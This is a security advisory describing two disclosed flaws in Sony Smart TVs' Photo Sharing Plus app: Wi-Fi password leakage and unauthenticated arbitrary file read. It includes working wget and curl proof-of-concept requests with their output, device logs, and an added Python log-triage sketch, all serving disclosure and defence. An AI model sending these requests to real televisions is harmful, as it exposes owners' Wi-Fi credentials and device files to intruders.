23 Apr 19

Security flaws uncovered in Sony Smart TVs


Over the last decades, basic televisions have evolved: with the integration of internet services and applications, they have become similar to smartphones. With the advent of smart TVs, the information security community has taken a strong interest in them. The vulnerabilities exist not only in homes but also in companies and organisations where smart TVs are used in conference and meeting rooms. Multiple vulnerabilities have been uncovered, such as information leakage resulting in privacy issues, and issues in embedded applications.

xen1thLabs has implemented a test environment to assess the security level of Smart TVs. The testbed is based on open source tools, namely gr-dvbt (https://github.com/BogdanDIA/gr-dvbt) and a ready-to-use Hybrid Broadcast Broadband TV (HbbTV) test suite (https://github.com/mitxp/HbbTV-Testsuite), together with a software-defined radio, and serves HbbTV applications to Smart TVs. The testbed and the implemented test applications were presented during HiTB 2018 in the talk “Hacking into Broadband and Broadcast TV Systems” (https://conference.hitb.org/hitbsecconf2018dxb/sessions/hacking-into-broadband-and-broadcast-tv-systems/).

Our security researchers found two vulnerabilities in Sony products in October 2018 while auditing the security of Smart TVs. xen1thLabs coordinated the disclosure of these vulnerabilities with Sony. The “Photo Sharing Plus” application running inside the Smart TV contains several weaknesses. This application allows uploading pictures from a smartphone to the TV in order to display them on a large screen. When started, Photo Sharing Plus turns the TV into a Wi-Fi access point and shows a Wi-Fi password, allowing customers to connect and share their media content on the Sony Smart TV.

The first vulnerability allows an attacker on the LAN/Wi-Fi, without authentication, to retrieve the Wi-Fi password created by the television when the Photo Sharing Plus application is started.

The second vulnerability allows an attacker to read arbitrary files located on the TV, including valuable files, without authentication.

The number of affected Sony models is very high and Sony has decided to remove this vulnerable application from all models (https://www.sony.com/electronics/support/televisions-projectors/articles/00204331).

Sony provided a non-exhaustive list of affected TV models from 2015-2016.

KDL-50W800C, KDL-50W805C, KDL-50W807C, KDL-50W809C, KDL-50W820C, KDL-55W800C, KDL-55W805C, KDL-65W850C, KDL-65W855C, KDL-65W857C, KDL-75W850C, KDL-75W855C, XBR-43X830C, XBR-49X800C, XBR-49X830C, XBR-49X835C, XBR-49X837C, XBR-49X839C, XBR-55X805C, XBR-55X807C, XBR-55X809C, XBR-55X810C, XBR-55X850C, XBR-55X855C, XBR-55X857C, XBR-65X800C, XBR-65X805C, XBR-65X807C, XBR-65X809C, XBR-65X810C, XBR-65X850C, XBR-65X855C, XBR-65X857C, XBR-75X850C, XBR-75X855C, XBR-55X900C, XBR-55X905C, XBR-55X907C, XBR-65X900C, XBR-65X905C, XBR-65X907C, XBR-65X930C, XBR-75X910C, XBR-75X940C, XBR-75X945C, XBR-43X800D, XBR-49X800D, XBR-49X835D, XBR-55X850D, XBR-55X855D, XBR-55X857D, XBR-65X850D, XBR-65X855D, XBR-65X857D, XBR-75X850D, XBR-75X855D, XBR-75X857D, XBR-85X850D, XBR-85X855D, XBR-85X857D, XBR-55X930D, XBR-65X930D, XBR-65X935D, XBR-65X937D, XBR-75X940D, XBR-100Z9D, XBR-49X700D, XBR-55X700D, XBR-65X750D, XBR-65Z9D, XBR-75Z9D, XBR-43X800E, XBR-49X800E, XBR-49X900E, XBR-55A1E, XBR-55X800E, XBR-55X806E, XBR-55X900E, XBR-55X930E, XBR-65A1E, XBR-65X850E, XBR-65X900E, XBR-65X930E, XBR-75X850E, XBR-75X900E, XBR-75X940E, XBR-77A1E.

It is important to note that the list is not complete and recent models are also affected.

 

CVE-2019-11336 - Sony Smart TV Photo Sharing Plus Information Disclosure Vulnerability

An unauthenticated remote attacker can retrieve the plaintext wireless password from the “Photo Sharing Plus” API.

After starting the application, the wireless password created by the TV can be retrieved from the LAN without authentication (the IP of the TV is 192.168.1.102):

root@kali:~# wget -qO- --post-data='{"id":80,"method":"getContentShareServerInfo","params":[],"version":"1.0"}' http://[ip_tv]:10000/contentshare/

 

{"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}

 

The password is 8362tbwX.

By reading the logs on the TV, we can confirm that the password has been delivered over HTTP, without authentication. The logs contain the password in plain text:

01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","keyType":"","key":"8362tbwX","deviceName":"","url":"http:\/\/192.168.49.1","touchPadRemote":"notSupported"}],"id":80}

CVE-2019-10886 - Sony Smart TV Photo Sharing Plus Arbitrary File Read Vulnerability

This vulnerability allows an attacker to retrieve internal files located inside the TV file system, without authentication.

By default, images used by the Photo Sharing Plus application are stored inside ‘/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/’. The application starts an access point on the television, and an HTTP daemon listens on a TCP port on the newly created WLAN. Furthermore, this daemon also listens on the LAN side of the television, so an image can be retrieved from the LAN using this URL:

http://[ip_tv]:10000/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG

Browsing to the web address http://[ip_tv]:10000/contentshare/image/ allows access to the root directory of the television running Android. 

By exploiting this vulnerability, ‘/default.prop’ (containing Android properties) can be retrieved via http://192.168.1.102:10000/contentshare/image/default.prop

 

root@kali:~# curl -v http://192.168.1.102:10000/contentshare/image/default.prop
*   Trying 192.168.1.102...
* TCP_NODELAY set
* Connected to 192.168.1.102 (192.168.1.102) port 10000 (#0)
> GET /contentshare/image/default.prop HTTP/1.1
> Host: 192.168.1.102:10000
> User-Agent: curl/7.58.0
> Accept: */*
< HTTP/1.1 200 OK
< Connection: close
< Content-Length: 591
< Content-Type: application/octet-stream
#
# ADDITIONAL_DEFAULT_PROPERTIES
#
ro.secure=1
security.perf_harden=1
ro.allow.mock.location=0
ro.debuggable=0
ro.zygote=zygote32
dalvik.vm.image-dex2oat-Xms=64m
dalvik.vm.image-dex2oat-Xmx=64m
dalvik.vm.dex2oat-Xms=64m
dalvik.vm.dex2oat-Xmx=512m
ro.dalvik.vm.native.bridge=0
debug.atrace.tags.enableflags=0
#
# BOOTIMAGE_BUILD_PROPERTIES
#
ro.bootimage.build.date=2016年 11月 14日 月曜日 15:34:56 JST
ro.bootimage.build.date.utc=1479105296
ro.bootimage.build.fingerprint=Sony/BRAVIA_ATV2_PA/BRAVIA_ATV2:6.0.1/MMB29V.S50/1.6.0.06.14.0.00:user/release-keys
persist.sys.usb.config=none
* Closing connection 0
root@kali:~#

 

Device logs confirm the ‘/default.prop’ file has been delivered over HTTP:

 

01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]getLocalFilePath() start, uri=/contentshare/image/default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]loadType: /contentshare/image

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]localResPath: /default.prop

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]ext:.prop

01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Content Type :application/octet-stream

01-01 07:46:00.891 5539 18775 D PhotoShareApp: [18775][e]fileSize:591

01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response ... 591

01-01 07:46:00.892 5539 18775 D PhotoShareApp: [18775][e]Write to response completed.
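
As an added example (not xen1thLabs' or Sony's code), the Python sketch below triages logcat lines of the kind shown above: it flags "Handle get Uri" requests whose path resolves outside the Photo Sharing Plus image directory, and responses that write the Wi-Fi key into the log. The confined_path mapping, the function and finding names, and the sample lines are assumptions made for illustration; the URL prefix and directory come from the advisory.

```python
import posixpath
import re
from urllib.parse import unquote

# URL prefix and image directory as given in the advisory.
LOAD_TYPE = "/contentshare/image"
SHARE_DIR = "/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP"
# logcat layout from the excerpts: date time pid tid level tag: message
LOG_RE = re.compile(r"^(?P<ts>\d\d-\d\d \d\d:\d\d:\d\d\.\d{3})\s+\d+\s+\d+\s+"
                    r"[VDIWEF]\s+(?P<tag>[^:]+): (?P<msg>.*)$")
URI_RE = re.compile(r"Handle get Uri :(?P<uri>\S+)")
KEY_RE = re.compile(r'"key":"[^"]+"')


def confined_path(uri):
    """Hypothetical hardened mapping: local path, or None if outside SHARE_DIR."""
    path = unquote(uri.split("?", 1)[0])
    if not path.startswith(LOAD_TYPE + "/"):
        return None
    # Collapse "." and ".." first; a device would also resolve symlinks.
    local = posixpath.normpath("/" + path[len(LOAD_TYPE):].lstrip("/"))
    return local if local.startswith(SHARE_DIR + "/") else None


def triage(lines):
    """Return (timestamp, finding, detail) for each suspicious log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        tag, msg = m["tag"].strip(), m["msg"]
        req = URI_RE.search(msg)
        if tag == "PhotoShareApp" and req and req["uri"].startswith(LOAD_TYPE):
            if confined_path(req["uri"]) is None:
                findings.append((m["ts"], "file-read-outside-share", req["uri"]))
        elif tag == "System.out" and "HttpEndPoint: send:" in msg and KEY_RE.search(msg):
            findings.append((m["ts"], "wifi-key-in-log", "key redacted"))
    return findings


# Constructed sample in the layout of the excerpts above (key is a placeholder).
SAMPLE = r'''
01-01 07:46:00.891 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/default.prop
01-01 07:46:05.102 5539 18775 I PhotoShareApp: [18775][e]Handle get Uri :/contentshare/image/data/user/0/com.sony.dtv.photosharingplus/files/_BRAVPSS.TMP/LJYT0010.JPG
01-01 07:47:23.730 5539 18687 I System.out: [MEXI][D] HttpEndPoint: send: {"result":[{"ssid":"DIRECT-GD-BRAVIA","key":"EXAMPLEKEY"}],"id":80}
'''.splitlines()
if __name__ == "__main__":
    print(*triage(SAMPLE), sep="\n")
```

The same confined_path check, applied before a file is opened, is the kind of mapping that would keep the image endpoint inside its own directory.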

Impact

It is possible, without authentication, to read arbitrary files and to disclose the wireless password.

Conclusion

The implemented testbed has proven efficient in finding vulnerabilities in Smart TVs. Multiple vulnerabilities were found, i.e. known public vulnerabilities in outdated software and unknown vulnerabilities, as well as new attack scenarios. The multiple vulnerabilities uncovered in Smart TVs by previous security assessments and by this vulnerability research clearly show that you need to be careful with Smart TVs in critical environments, as HbbTV represents a significant attack vector. We suggest that HbbTV be deactivated through a strict policy (although confidence in the software deactivation remains questionable), as Smart TVs are normally only used for presentations in meeting rooms. Moreover, like any IT asset, Smart TVs should have the latest security patches.

xen1thLabs would like to thank the Sony PSIRT team for their responsible cooperation in fixing these vulnerabilities.

 


By xen1thLabs